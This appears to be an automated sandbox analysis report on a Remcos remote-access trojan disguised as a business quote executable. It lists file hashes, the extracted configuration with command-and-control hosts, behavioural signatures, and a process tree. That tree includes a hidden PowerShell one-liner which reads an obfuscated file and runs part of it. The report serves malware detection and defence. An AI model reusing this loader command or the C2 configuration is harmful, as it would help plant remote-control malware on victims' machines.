Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/10/2024, 23:07
Static task
static1
Behavioral task
behavioral1
Sample
QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Chine/Aake.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Chine/Aake.ps1
Resource
win10v2004-20241007-en
General
-
Target
QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe
-
Size
836KB
-
MD5
837843cbc8249c71125a2113d1acd71f
-
SHA1
aa80a680576261190000a9b6c113b4bcef1d8728
-
SHA256
ec8356a9908aad8b184033c27bc7c94a8332a5c16371d72442a49a86669e57e5
-
SHA512
2059553ac3c08d5d389c513242a3ee40ea176027c38d25e6d3e3aa6b7349fdf81405da8b453a0107fd1aa3a7435d7209655338ddb51ce4bb1ccb38786485ce4a
-
SSDEEP
12288:XjWxDtrp10yzIDrOXive++gc4c/xF5IqsEHnz2InxJTuINvhUNmvIiyC7:XjmHErOXiveDgclpDjfnz2gxJKlil
Malware Config
Extracted
remcos
OCTOBER
windowxpjoke.duckdns.org:24044
84.38.132.104:1985
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
explorre
-
copy_folder
explorre
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-OAEVAI
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 776 powershell.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 28 1404 msiexec.exe 43 1404 msiexec.exe 45 1404 msiexec.exe 46 1404 msiexec.exe 48 1404 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1404 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 776 powershell.exe 1404 msiexec.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\amazonjunglen.lnk QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe File created C:\Program Files (x86)\Common Files\amazonjunglen.lnk QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 776 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 776 powershell.exe Token: SeIncreaseQuotaPrivilege 776 powershell.exe Token: SeSecurityPrivilege 776 powershell.exe Token: SeTakeOwnershipPrivilege 776 powershell.exe Token: SeLoadDriverPrivilege 776 powershell.exe Token: SeSystemProfilePrivilege 776 powershell.exe Token: SeSystemtimePrivilege 776 powershell.exe Token: SeProfSingleProcessPrivilege 776 powershell.exe Token: SeIncBasePriorityPrivilege 776 powershell.exe Token: SeCreatePagefilePrivilege 776 powershell.exe Token: SeBackupPrivilege 776 powershell.exe Token: SeRestorePrivilege 776 powershell.exe Token: SeShutdownPrivilege 776 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeSystemEnvironmentPrivilege 776 powershell.exe Token: SeRemoteShutdownPrivilege 776 powershell.exe Token: SeUndockPrivilege 776 powershell.exe Token: SeManageVolumePrivilege 776 powershell.exe Token: 33 776 powershell.exe Token: 34 776 powershell.exe Token: 35 776 powershell.exe Token: 36 776 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 820 wrote to memory of 776 820 QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe 87 PID 820 wrote to memory of 776 820 QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe 87 PID 820 wrote to memory of 776 820 QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe 87 PID 776 wrote to memory of 1404 776 powershell.exe 99 PID 776 wrote to memory of 1404 776 powershell.exe 99 PID 776 wrote to memory of 1404 776 powershell.exe 99 PID 776 wrote to memory of 1404 776 powershell.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe"C:\Users\Admin\AppData\Local\Temp\QUOTE #46789-OCT24_JAMEELA TRD LLCS.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Trusserederi=Get-Content -raw 'C:\Users\Admin\AppData\Local\deporteringer\disaffecting\Duvetinejakkernes\Chine\Aake.omr';$Energids=$Trusserederi.SubString(54101,3);.$Energids($Trusserederi)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1404
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f886923d45d7bd0383b99a38997c079c
SHA13578635e87a7e31aead96bc12154710a36ecd0f9
SHA2561682041ef24387f8ce10531c7b88fda78437329a13a2f09a2403504eb6cef797
SHA51283472d7a5ee30b0337d386ba8c57eeb722bed385c8f0d6df57b85aaf38e26d5df087c0e057b8f6b106324c4f9598ae713a6af013a89c46e016163e844fd8544e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
52KB
MD576c2e06efc11f956e4e7a6aad633f3b7
SHA1ac79ab670ddb7874b259d2f0ff5c5283c5ff90ee
SHA256cfbc27159dd8a2ce54dce1125e0cdc2dc27db461e355ad318cefd1f37a452898
SHA512b8582f6559ad0f642a000bf1c7be68c537ef9bc206ee9de0c4da70614d176e11e34b2fba607f6c33942b5200f518c24d04e43957b57c9c09c8aceaecf0f1050b
-
Filesize
319KB
MD5d798bc47e69bf01535b9b2381019b48e
SHA16230415081882f24e9a8ec15c3da9c9f31031287
SHA25698298bed5177b6c4836842828e84b448d4373a004c4e8ac5ce5839d027a33b38
SHA51281c616f2f6e51a962a7647edcfb5aa8bf65c4f0d8ff10d701480605ac539d635bb4b1a0fdcf95e1862adcecbe0f6b3c2f1fffe86d68832a3450cb80bb207c2ad